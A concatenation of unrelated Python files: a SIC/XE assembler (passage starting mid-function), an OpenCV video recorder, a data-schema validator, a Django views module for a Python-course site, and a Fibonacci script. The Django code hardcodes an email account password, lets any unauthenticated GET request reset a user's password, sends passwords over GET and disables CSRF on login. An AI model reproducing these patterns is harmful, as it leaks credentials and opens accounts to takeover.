return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + str(reg_nums[registers.index(self.operand2.lower())])
elif self.optype == 'r1':
return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + '0'
elif self.optype == 'n':
return opcode_table[self.mnemonic][3] + hex(int(self.operand1))[-1].upper() + '0'
else:
return opcode_table[self.mnemonic][3] + str(reg_nums[registers.index(self.operand1.lower())]) + hex(int(self.operand2) - 1)[-1].upper()
elif self._format == 3:
# order of addressing: extended(if + is provided), then based(if base directive provided), then direct, then pc-relative, then sic
# for based: 0 <= disp <= 4095
# for pc-relative: -2048 <= disp <= 2047
opc = opcode_table[self.mnemonic][3]
opc_orig = opc
if self.mnemonic == 'rsub':
return '4F0000'
if self.operand1 in symbols_undef:
print("Undefined symbol: " + self.operand1 + ' in line ' + self.line_num)
sys.exit(1)
loc = hex(sym_tab[self.operand1])
assembled = False
#based
if self.based:
baseloc = None
if based_holder[1] in sym_tab:
baseloc = sym_tab[based_holder[1]]
disp = int(loc, 16) - baseloc
if 0 <= disp <= 4095:
assembled = True
disp = hex(disp)[hex(disp).index('x')+1:]
if len(disp) < 3:
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + 'C' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '4' + disp
else:
print("Illegal base directive: " + based_holder[1])
sys.exit(1)
opc = opc_orig
# direct
if len(loc[loc.index('x') + 1:]) <= 3 and assembled is False:
assembled = True
disp = loc[loc.index('x') + 1:]
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '8' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '0' + disp
opc = opc_orig
#pc-relative
if assembled is False:
disp = int(loc, 16) - (self.pc_ctr)
if -2048 <= disp <= 2047:
assembled = True
if disp < 0:
disp = 4096 + disp
disp = hex(disp)[hex(disp).index('x')+1:]
while len(disp) < 3:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + 'A' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '2' + disp
opc = opc_orig
#sic
if assembled is False:
disp = loc[loc.index('x')+1:]
if int(disp, 16) <= int('7fff', 16):
assembled = True
if self.indexed:
disp = hex(int('8000', 16) + int(disp, 16))
disp = disp[disp.index('x')+1:]
while len(disp) < 4:
disp = '0' + disp
return opc + disp
if not assembled:
print('Memory address too large. Try using extended format in line ' + self.line_num)
sys.exit(1)
elif self._format == 4:
opc = opcode_table[self.mnemonic][3]
loc = hex(sym_tab[self.operand1])
disp = loc[loc.index('x')+1:]
if int(disp, 16) <= int('fffff', 16):
while len(disp) < 5:
disp = '0' + disp
if self.immediate:
opc = hex(int(opc, 16) + 1)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
elif self.indirect:
opc = hex(int(opc, 16) + 2)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
elif self.indexed:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '9' + disp
else:
opc = hex(int(opc, 16) + 3)
opc = opc[opc.index('x') + 1:]
if len(opc) == 1:
opc = '0' + opc
return opc + '1' + disp
else:
print('Memory address too large for extended format: Line ' + self.line_num)
sys.exit(1)
return "Not yet done"
def parse_asm(line, ctr, linectr):
if ctr > int('fffff', 16):
print('Instruction ends beyond maximum memory address for SIC/XE: Line ' + str(linectr))
sys.exit(1)
line = untabify(line)
orig = line
line, comment_ = orig[:40], orig[40:]
label_ = None
mnemonic = None
operand1 = None
operand2 = None
format_instr = None
ext = False
imm = False
indexed = False
indirect = False
optype = None
FullCommentRe = re.compile(r'^\s*\.+(?P<fullcomment>.*)$')
comment_search = FullCommentRe.search(line)
if comment_search:
comment_ = comment_search.group('fullcomment')
# print('This is the comment: ')
# print(comment_)
# print('-------')
line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
linectr += 1
return (ctr, False, linectr)
LabelRe = re.compile(r'^\s*(?P<label>[a-z0-9_]*)\s*:', re.IGNORECASE)
label_search = LabelRe.search(line)
if label_search:
label_ = label_search.group('label').lower()
if label_ in registers:
print('Register used where label expected in line ' + str(linectr))
sys.exit(1)
line = line[line.index(':')+1:]
if label_search.group('label').lower() in sym_tab:
print('Error: Line ' + str(linectr) + ', Symbol redefinition: ', label_search.group('label').lower())
sys.exit(1)
if label_search.group('label')[0].isnumeric():
if not label_search.group('label').isnumeric():
print('Extraneous characters in line ' + str(linectr))
sys.exit(1)
sym_tab[label_search.group('label').lower()] = ctr
if label_search.group('label').lower() in symbols_undef:
symbols_undef.remove(label_search.group('label').lower())
else:
if ':' in line and line.count('\'') < 2:
temp_label = line[:line.index(':')]
if temp_label[0].isalpha() is False:
print('Label must start with letters. Error in line ' + str(linectr))
print(orig)
sys.exit(1)
if line.isspace() or line == '':
line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
linectr += 1
return (ctr, False, linectr)
MnemonicRe = re.compile(r'\s*(?P<mnemonic>\+*[a-z]+)\s*', re.IGNORECASE)
mnemonic_search = MnemonicRe.search(line)
curr_mnemonic = None
if mnemonic_search:
curr_mnemonic = mnemonic_search.group('mnemonic').lower()
line = line.lstrip()
line = line[len(curr_mnemonic)+1:]
if curr_mnemonic[0] == '+':
ext = True
curr_mnemonic = curr_mnemonic[1:]
if opcode_table[curr_mnemonic][0] != 'm':
print('Unrecognized instruction or directive: Line ' + str(linectr))
sys.exit(1)
else:
print('Invalid instruction in line ' + str(linectr))
sys.exit(1)
curr_mnemonic = curr_mnemonic.rstrip()
mnemonic = curr_mnemonic
#check if its a directive
if curr_mnemonic in directives:
if curr_mnemonic == 'byte':
byteRe = re.compile(r'\s*(?P<byte>c*x*\'*-*.+\'*)\s*', re.IGNORECASE)
bytesearch = byteRe.search(line)
if bytesearch:
line = line.lstrip()
line = line[len(bytesearch.group('byte')):]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
num_bytes = bytesearch.group('byte')
num_bytes = num_bytes.rstrip()
operand1 = num_bytes
if num_bytes[:2].lower() == 'c\'':
if num_bytes.count('\'') < 2:
print('Illegal declaration of bytes in line ' + str(linectr))
print(orig)
sys.exit(1)
if num_bytes[-1] != '\'':
while num_bytes[-1] != '\'':
num_bytes = num_bytes[:-1]
ctr += len(num_bytes[2:-1])
elif num_bytes[:2].lower() == 'x\'':
if num_bytes.count('\'') != 2:
print('Illegal declaration of bytes in line ' + str(linectr))
print(orig)
sys.exit(1)
if num_bytes[-1] != '\'':
while num_bytes[-1] != '\'':
num_bytes = num_bytes[:-1]
for char in num_bytes[2:-1]:
if char.lower() not in '0123456789abcdef':
print('Illegal declaration of bytes in line ' + str(linectr))
print(orig)
sys.exit(1)
ctr += math.ceil((len(num_bytes[2:-1])) / 2)
else:
sign = ''
if operand1[0] == '-' or operand1[0] == '+':
sign = operand1[0]
operand1 = operand1[1:]
if not operand1.isnumeric():
print('Illegal declaration of constant in line ' + str(linectr))
sys.exit(1)
operand1 = sign + operand1
if int(operand1) < -128 or int(operand1) > 255:
print('Byte size too large: Line ' + str(linectr))
sys.exit(1)
ctr += 1
else:
print('Please declare a byte in line ' + str(linectr))
sys.exit(1)
elif curr_mnemonic == 'word':
temp_line = line.lstrip()
c = 0
if temp_line[0] == '-' or temp_line[0] == '+':
c = 1
while temp_line[c] in '0123456789':
c += 1
if not temp_line[c:].isspace() and temp_line[c:] != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
num = int(temp_line[:c])
operand1 = num
if num >= pow(16, 6) or num < (-(pow(16, 6)) / 2):
print('Memory error: Line '+ str(linectr) + ', Size of bytes being reserved too large')
sys.exit(1)
ctr += 3
elif curr_mnemonic == 'resb':
temp_line = line.lstrip()
c = 0
while temp_line[c] in '0123456789':
c += 1
if not temp_line[c:].isspace() and temp_line[c:] != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
num = int(temp_line[:c])
operand1 = num
ctr += num
elif curr_mnemonic == 'base':
based_holder[0] = True
basedopsearch = re.compile(r'\s*(?P<based>@*#*\s*[a-z0-9_]+)\s*', re.IGNORECASE)
basedsearch = basedopsearch.search(line)
if basedsearch:
line = line.lstrip()
line = line[len(basedsearch.group('based')):]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
based_sym = basedsearch.group('based').rstrip()
if based_sym[0] == '_':
print('Illegal base directive: Line ' + str(linectr))
sys.exit(1)
if based_sym[0].isnumeric():
if not based_sym[1:].isnumeric():
print('Extraneous characters in line ' + str(linectr))
sys.exit(1)
if based_sym in registers:
print('Register used where label expected: Line ' + str(linectr))
sys.exit(1)
operand1 = based_sym
based_holder.append(based_sym)
else:
print('Provide a symbol for the base directive in line ' + str(linectr))
sys.exit(1)
elif curr_mnemonic == 'nobase':
based_holder[0] = False
elif curr_mnemonic == 'resw':
temp_line = line.lstrip()
c = 0
while temp_line[c] in '0123456789':
c += 1
num = int(temp_line[:c])
operand1 = num
ctr += (num * 3)
elif curr_mnemonic == 'start':
if linectr > 0:
for l in line_lst:
if l.mnemonic or l.label:
print('Start encountered after first line')
sys.exit(1)
startRe = re.compile(r'\s*(?P<start>[a-f0-9]+)\s*', re.IGNORECASE)
startSearch = startRe.search(line)
if startSearch:
line = line.lstrip()
line = line[len(startSearch.group('start')):]
if not line.isspace():
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
ctr = int(startSearch.group('start').rstrip(), 16)
if ctr > int('fffff', 16):
print('Start address too large')
sys.exit(1)
if label_search:
sym_tab[label_search.group('label').lower()] = ctr
# else:
# print('No\Invalid start address provided in line ' + str(linectr))
# sys.exit(1)
elif curr_mnemonic == 'end':
endsearchre = re.compile(r'\s*(?P<end>[a-z0-9]*)\s*', re.IGNORECASE)
endsearch = endsearchre.search(line)
if endsearch:
line = line.lstrip()
line = line[len(endsearch.group('end')):]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand1 = endsearch.group('end').rstrip()
if operand1.isalpha() and operand1.lower() not in sym_tab:
print('Undefined symbol defined as entry point in end instruction: ' + operand1)
sys.exit(1)
line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
linectr += 1
return (ctr, True, linectr)
elif curr_mnemonic in opcode_table:
mnemonic_lst = opcode_table[curr_mnemonic]
optype = mnemonic_lst[0]
if mnemonic_lst[2] == '3' and ext:
ctr += 4
format_instr = 4
else:
ctr += int(mnemonic_lst[2])
format_instr = int(mnemonic_lst[2])
if mnemonic_lst[0] == 'm':
operandLabelRe = re.compile(r'\s*(?P<oplabelre>@*#*\s*[a-z0-9_]+\s*,*\s*x*)\s*', re.IGNORECASE)
oplabelsearch = operandLabelRe.search(line)
if oplabelsearch:
operand1 = oplabelsearch.group('oplabelre').lower().replace(' ', '')
line = line.lstrip()
if operand1.rstrip().isnumeric():
if not line[0].isnumeric():
print('Illegal instruction format: Line ' + str(linectr))
sys.exit(1)
line = line[len(oplabelsearch.group('oplabelre')):]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand1 = operand1.rstrip()
if ',x' in operand1:
indexed = True
operand1 = operand1[:-2]
if '@' in operand1:
indirect = True
operand1 = operand1[1:]
if '#' in operand1:
imm = True
operand1 = operand1[1:]
if '\n' in operand1:
operand1 = operand1.replace('\n', '')
if (imm and indexed) or (indirect and indexed) or (imm and indirect):
print('Can not combine adrressing modes: Line ' + str(linectr))
sys.exit(1)
if operand1[0].isnumeric():
for char in operand1[1:]:
if char.lower() in 'abcdefghijklmnopqrstuvwxyz':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
if operand1 in registers:
print('Register used where symbol expected: Line ' + str(linectr))
sys.exit(1)
if operand1 not in sym_tab and operand1 not in symbols_undef and not operand1.isnumeric():
symbols_undef.append(operand1)
else:
#raise an error
print('Error: Must provide a memory symbol, Line ' + str(linectr))
sys.exit(1)
elif mnemonic_lst[0] == 'r' and mnemonic_lst[1] == 2:
operandRegRe = re.compile(r'\s*(?P<opRegre>(a|b|x|l|pc|sw|b|s|t|f)\s*,\s*(a|b|x|l|pc|sw|b|s|t|f))\s*', re.IGNORECASE)
opregsearch = operandRegRe.search(line)
if opregsearch:
line = line.lstrip()
line = line[len(opregsearch.group('opRegre'))+1:]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand = opregsearch.group('opRegre').replace(' ', '')
operand1, operand2 = operand.split(',')
operand1, operand2 = operand1.rstrip(), operand2.rstrip()
else:
print('Error: Must provide a valid register, Line ' + str(linectr))
sys.exit(1)
elif mnemonic_lst[0] == 'r1' and mnemonic_lst[1] == 1:
operandSingleRegRe = re.compile(r'\s*(?P<opsingleRe>(a|b|x|l|pc|sw|b|s|t|f))\s*', re.IGNORECASE)
opsinglesearch = operandSingleRegRe.search(line)
if opsinglesearch:
line = line.lstrip()
line = line[len(opsinglesearch.group('opsingleRe'))+1:]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand1 = opsinglesearch.group('opsingleRe').rstrip()
else:
print('Error: Must provide a valid register, Line ' + str(linectr))
sys.exit(1)
elif mnemonic_lst[0] == 'r/n':
operandRegNRe = re.compile(r'\s*(?P<opRegNre>(a|b|x|l|pc|sw|b|s|t|f)\s*,\s*[0-9]+)\s*', re.IGNORECASE)
opregNsearch = operandRegNRe.search(line)
if opregNsearch:
line = line.lstrip()
line = line[len(opregNsearch.group('opRegNre'))+1:]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand = opregNsearch.group('opRegNre').replace(' ', '')
operand1, operand2 = operand.split(',')
operand1, operand2 = operand1.rstrip(), operand2.rstrip()
if curr_mnemonic == 'shiftl' or curr_mnemonic == 'shiftr':
if int(operand2) > 16 or int(operand2) < 1:
print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
sys.exit(1)
elif int(operand2) > 15 or int(operand2) < 0:
print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
sys.exit(1)
else:
print('Error: Must provide a valid register and positive number less than 16, Line ' + str(linectr))
sys.exit(1)
elif mnemonic_lst[0] == 'n':
operandNRe = re.compile(r'\s*(?P<opNre>[0-9]+)\s*', re.IGNORECASE)
opNsearch = operandNRe.search(line)
if opNsearch:
line = line.lstrip()
if not line[0].isnumeric():
print('Illegal instruction format: Line ' + str(linectr))
sys.exit(1)
line = line[len(opNsearch.group('opNre'))+1:]
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr))
print(orig)
sys.exit(1)
operand1 = opNsearch.group('opNre').replace(' ', '').rstrip()
if int(operand1) > 15 or int(operand1) < 0:
print('Error: Illegal constant bigger than 16 in line ' + str(linectr))
sys.exit(1)
else:
print('Error: Must provide a positive number less than 16, Line ' + str(linectr))
sys.exit(1)
elif mnemonic_lst[0] == None:
line = line.lstrip()
if not line.isspace() and line != '':
print('Extraneous characters in line ' + str(linectr) + ':')
print(orig)
sys.exit(1)
else:
print(orig)
print('Invalid instruction in line ' + str(linectr))
sys.exit(1)
# everything else at this point should be a comment
# fix to check for column 40
line = line.lstrip()
comment_ = line
#create a line object and append to line lst
line_lst.append(Line(orig, linectr, ctr, label_, mnemonic, comment_, optype,
operand1, operand2, imm, indirect, indexed, ext, based_holder[0], format_instr))
linectr += 1
return (ctr, False, linectr)
def untabify(string):
c, s_lst = 0, list(string)
while True:
if c == len(s_lst):
return ''.join(s_lst)
if s_lst[c] == '\t':
bef, aft = s_lst[:c], s_lst[c+1:]
x = len(bef)
while x % 8 != 0:
x += 1
spaces = x - len(bef)
if spaces == 0:
spaces = 8
for _ in range(spaces):
bef.append(' ')
s_lst = bef + aft
else:
c += 1
def main():
''' The main function '''
# ######################################## #
# Pass 1
if len(sys.argv) != 3:
print('Command line arguments insufficient')
sys.exit(1)
f = sys.argv[1]
if os.stat(f).st_size == 0:
print('0: No code or data in assembly file:')
sys.exit(1)
try:
f = open(sys.argv[1], encoding='utf-8')
except FileNotFoundError:
print('Please provide a file that exists')
sys.exit(1)
locctr, linectr, endf = 0, 0, False
for line in f:
locctr, endf, linectr = parse_asm(line, locctr, linectr)
if endf:
break
if not endf:
print('Program did not contain an end directive')
sys.exit(1)
no_code = True
for line in line_lst:
if line.mnemonic != 'start' and line.mnemonic != 'end' and line.mnemonic != 'base' and line.mnemonic != 'nobase':
no_code = False
break
if no_code:
print('No code or data in assembly file')
sys.exit(1)
# Print out the symbol table
# lst = list(sym_tab.keys())
# lst.sort()
# print('Symbols:')
# for key in lst:
# sym = hex(sym_tab[key])
# sym = sym.replace('x','0')
# if len(sym) < 6:
# while len(sym) < 6:
# sym = '0' + sym
# elif len(sym) > 6:
# while len(sym) > 6:
# sym = sym[1:]
# print(' ' + key.upper() + ': ' + sym.upper())
# ######################################### #
# Pass 2
for line in line_lst:
all_objCode.append(line.assemble())
print(all_objCode[-1])
if __name__ == "__main__":
main()
|
'''The MIT License (MIT)
Copyright (c) 2021, Demetrius Almada
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
from collections import deque
from queue import Queue
from threading import Thread
import numpy as np
import cv2
import time
class EventRecorder:
def __init__(self, buffer_size=64, timeout=1.0):
self.buffer_size = buffer_size
self.timeout = timeout
self.frame_buffer = deque(maxlen=buffer_size)
self.frame_queue = None
self.is_recording = None
self.thread = None
self.writer = None
self.frames_without_motion = 0
self.consecutive_frames = 0
self.frames_since_screenshot = np.inf
def start(self, output_path, video_codec, fps):
self.is_recording = True
self.frame_queue = Queue()
(height, width, _) = self.frame_buffer[0].shape
self.writer = cv2.VideoWriter(
output_path,
video_codec,
fps,
(height, width)
)
for i in range(len(self.frame_buffer), 0, -1):
self.frame_queue.put(self.frame_buffer[i - 1])
self.thread = Thread(target=self.record_video, args=())
self.thread.daemon = True
self.thread.start()
def update(self, frame):
'''
'''
self.frame_buffer.appendleft(frame)
if self.is_recording:
self.frame_queue.put(frame)
self.consecutive_frames += 1
def record_video(self):
while True:
if not self.is_recording:
return
if not self.frame_queue.empty():
frame = self.frame_queue.get()
self.writer.write(frame)
else:
time.sleep(self.timeout)
def take_screenshot(self, image, screenshot_path, delay=30):
if self.frames_since_screenshot >= delay:
cv2.imwrite(screenshot_path, image)
self.frames_since_screenshot = 0
self.frames_since_screenshot += 1
def stop(self):
self.is_recording = False
self.consecutive_frames = 0
self.thread.join()
while not self.frame_queue.empty():
frame = self.frame_queue.get()
self.writer.write(frame)
self.writer.release()
|
from Data_Validator.schema_reader import load_schema
from Log_Writer.logger import App_Logger
import numpy as np
def verify_with_schema(data,schema_path):
log_writer=App_Logger()
try:
col_length, col_names, dtypes = load_schema(schema_path)
err=0
# validating column length
if data.shape[1] == col_length:
log_writer.log("Column Length Validated")
else:
log_writer.log(f"\nColumn Lengths are greater or less than 20\n")
err+=1
return err
# validate column names
if set(list(data.columns)) == set(col_names):
log_writer.log("Column Names Validated")
else:
log_writer.log("\nColumn names are not as required by the format\n")
err+=1
return err
# validate data types
for col, dtype in zip(data.columns, dtypes):
a = 0
if data[col].dtypes == np.dtype(dtype):
continue
else:
a += 1
if a > 0:
log_writer.log(f"\nThe data type of values in column {col} is not same as {dtype}\n")
log_writer.log("\nERROR in the data type of input data\n")
err+=1
return err
except Exception as e:
log_writer.log("\nERROR occured in data validation\n")
return print(e)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.shortcuts import *
from django.contrib import auth
from django.http import *
from django.core.mail import send_mail
from django.contrib.auth.models import User
from django.db import connection
from django.db.models import Count
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from htmlapp.forms import loginform
from htmlapp.models import *
from django.views.decorators.csrf import csrf_exempt
import smtplib
import random
def csrf_failure(request, reason=""):
mng="請勿不當操作。"
return render_to_response('404.html',locals())
def null_course(request):
mng="這是沒有選取過的課程!"
return render(request,'nullcourse.html',locals())
def index(request):
return render(request, 'index.html',locals())
def dess(request):
return render(request,'test.html')
@csrf_exempt
def login(request):
if request.method == 'POST':
form = loginform(request.POST)
mng=""
email = request.POST['email']
passd = request.POST['passd']
user = auth.authenticate(username=email , password=passd)
if user is not None and user.is_staff:
auth.login(request, user)
mng="登入成功"
return HttpResponseRedirect('/setting/',locals())
else:
mng="帳號或密碼錯誤"
return render(request,'login.html',locals())
else:
form = loginform()
if request.method == 'GET':
unpassword='unpassword'
user_email=User.objects.all()
user_email=[user_email[x].email for x in range(len(user_email))]
email=request.GET.get('email')
confirm=0
bool_email=bool(email)
if bool_email == True:
for x in range(len(user_email)):
if user_email[x] != email:
confirm=confirm+0
else:
confirm=confirm+1
if confirm == 1:
rand1 = [chr(random.randint(97, 122)) for x in range(4) ]
rand2 = [chr(random.randint(65, 90)) for x in range(4)]
rand=""
for x in range(len(rand1)):
rand=rand+rand1[x]+rand2[x]
user_password=User.objects.get(email=email)
user_password.set_password(rand)
user_password.save()
into='請記住新的密碼:'+rand+'\n若要修改請至 https://projecthtml-theleaves.c9users.io/ 登入後修改'
gmail_user = 'pythonbeginnercourse@gmail.com'
gmail_pwd = '3ajilojl'
smtpserver = smtplib.SMTP("smtp.gmail.com",587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
smtpserver.login(gmail_user, gmail_pwd)
fromaddr = "pythonbeginnercourse@gmail.com"
toaddrs = [email]
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\r\n" % (fromaddr, ", ".join(toaddrs), 'Python教學網站'))
smtpserver.sendmail(fromaddr, toaddrs,msg.encode('utf-8')+into.encode('utf-8'))
smtpserver.quit()
return render(request,'login.html',locals())
def logout(request):
auth.logout(request)
return HttpResponseRedirect('/index/')
def change_password(request):
if request.method == "POST":
password=User.objects.get(id=request.user.id)
change_password=request.POST['passd']
confirm_password=request.POST['passd2']
if change_password == confirm_password :
password.set_password(change_password)
password.save()
return render(request,'change_password.html',locals())
def register(request):
user_email=User.objects.all()
if (request.method == 'GET') and ('confirm' in request.GET):
acc_confirm = 0
email_confirm = 0
utest=User.objects.all()
user_acc=[utest[x].username for x in range(len(utest))]
confirm='confirm'
user_email=[user_email[x].email for x in range(len(user_email))]
email=request.GET.get('email')
acc=request.GET.get('acceunt')
for x in range(len(user_acc)):
if user_acc[x] == acc:
acc_confirm=acc_confirm+1
#else:
# acc_confirm=acc_confirm+1
for x in range(len(user_email)):
if user_email[x] == email:
email_confirm=email_confirm+1
#else:
# email_confirm=email_confirm+1
if acc_confirm ==0 and email_confirm ==0:
password=request.GET.get('passd')
password2=request.GET.get('passd2')
if password == password2 and password != '' and password2 != '':
bool_register=True
user_add=User.objects.create(username=acc,email=email,password=password,is_staff=True)
user_add.set_password(password)
user_add.save()
else:
bool_register=False
return render(request, 'register.html',locals())
@login_required
def setting(request):
row=course4_attribute.objects.filter(user_id=str(request.user.id))
coursebool=bool(row)
if coursebool != False:
test=course4_attribute.objects.filter(user_id=str(request.user.id))
testa=[x for x in test]
testc=len(testa)
if (request.method =="GET") and (testc != 0):
for x in range(len(testa)):
if str(testa[x].lesson_name)+"_cancel" in request.GET:
b=str(testa[x].lesson_name)
testc=testc-1
course=course4_attribute.objects.get(lesson_name=b)
course.user_id.remove(int(request.user.id)) # add 新增 remove 刪除
b=str(testa[x].lesson_name)+"_cancel"
course.save()
return render(request, 'set.html',locals())
@login_required
def course(request):
if request.method =='GET':
lesson=course4_attribute.objects.all()
a=[x for x in lesson]
for x in range(len(a)):
if str(a[x].lesson_name) in request.GET:
b=str(a[x].lesson_name)
course=course4_attribute.objects.get(lesson_name=b)
course.user_id.add(int(request.user.id)) # add 新增 remove 刪除
course.save()
elif str(a[x].lesson_name)+"_cancel" in request.GET:
b=str(a[x].lesson_name)+"_cancel"
return render(request, 'course.html',locals())
@login_required
def user(request):
lesson=course4_attribute.objects.filter(user_id=str(request.user.id)).order_by('id')
a=[lesson[x].id for x in range(len(lesson)) ]
tcourse= course4_detail.objects.values('course_attribute_id').annotate(dcount=Count('course_attribute_id')).order_by('course_attribute_id')
cs=course_user.objects.values('lesson_id').annotate(dcount=Count('coursename')).filter(user_id=str(request.user.id),correct=True).order_by('lesson_id')
tc=[]
tt=[]
tct=[]
for x in range(len(tcourse)):
for y in range(len(a)):
if tcourse[x]['course_attribute_id'] == a[y] :
tt.append({"課程":lesson[y].lesson,"課程數量":tcourse[x]['dcount']})
for x in range(len(cs)):
for y in range(len(a)):
if cs[x]['lesson_id'] == a[y] :
tc.append({"課程":lesson[y].lesson,"課程答對數":cs[x]['dcount']})
for x in range(len(tt)):
for y in range(len(tc)):
if tt[x]['課程'] == tc[y]['課程']:
tct.append({"課程":tc[y]['課程'],"百分比":(round(round(tc[y]['課程答對數']/tt[x]['課程數量'],4)*100,2))})
with connection.cursor() as cursor:
cursor.execute('SELECT count(coursename) FROM htmlapp_course_user WHERE user_id=%s and correct=%s group by lesson_id',[request.user.id,True])
row = cursor.fetchone()
with connection.cursor() as cursor:
cursor.execute('SELECT * FROM htmlapp_Introduction WHERE user_id=%s ',[request.user.id])
row2 = cursor.fetchone()
##修改個人資料
if request.method == 'GET':
if 'lastbtn' in request.GET:
lan='lastbtn'
lastn=request.GET.get("lastname")
user=User.objects.get(username=request.user.username)
elif 'lastbtn2' in request.GET:
lan='lastbtn2'
lastn=request.GET.get("lastname")
user=User.objects.get(username=request.user.username)
user.last_name=lastn
user.save()
if 'ebtn' in request.GET:
lan='ebtn'
user=User.objects.get(username=request.user.username)
elif 'ebtn2' in request.GET:
lan='ebtn2'
en=request.GET.get("ename")
user=User.objects.get(username=request.user.username)
user.email=en
user.save()
if 'firstbtn' in request.GET:
lan='firstbtn'
user=User.objects.get(username=request.user.username)
elif 'firstbtn2' in request.GET:
lan='firstbtn2'
fristn=request.GET.get("firstname")
user=User.objects.get(username=request.user.username)
user.first_name=fristn
user.save()
##若無介紹欄位創建空欄之後 每次進入都能夠修改
if bool(row2) != True:
arean=request.GET.get("areaname")
cour=Introduction(user_id=str(request.user.id),sef="")
cour.save()
elif bool(row2) == True :
fuser=Introduction.objects.get(user_id=request.user.id)
if 'areabtn' in request.GET:
lan='areabtn'
fuser=Introduction.objects.get(user_id=request.user.id)
elif 'areabtn2' in request.GET:
lan='areabtn2'
arean=request.GET.get("areaname")
fuser=Introduction.objects.get(user_id=request.user.id)
fuser.sef=arean
fuser.save()
return render(request,'./userdata/userdata.html',locals())
def login_error(request):
mng="請勿不當操作。"
return render(request,'404.html',locals())
|
n=int(input())
#naive recursive sol
#complexity is o(2*n)
# def fibo(n):
# if n==1 or n==2:
# return 1
# else:
# return fibo(n-1)+fibo(n-2)
#o(n)
def fibo(n):
if n==1 or n==2:
return n
dp_arr=[0]*int(n+1)
dp_arr[0]=1
dp_arr[1]=1
for i in range(2,n):
dp_arr[i] = dp_arr[i-1] + dp_arr[i-2]
return dp_arr[n-1]
print(fibo(n))
|
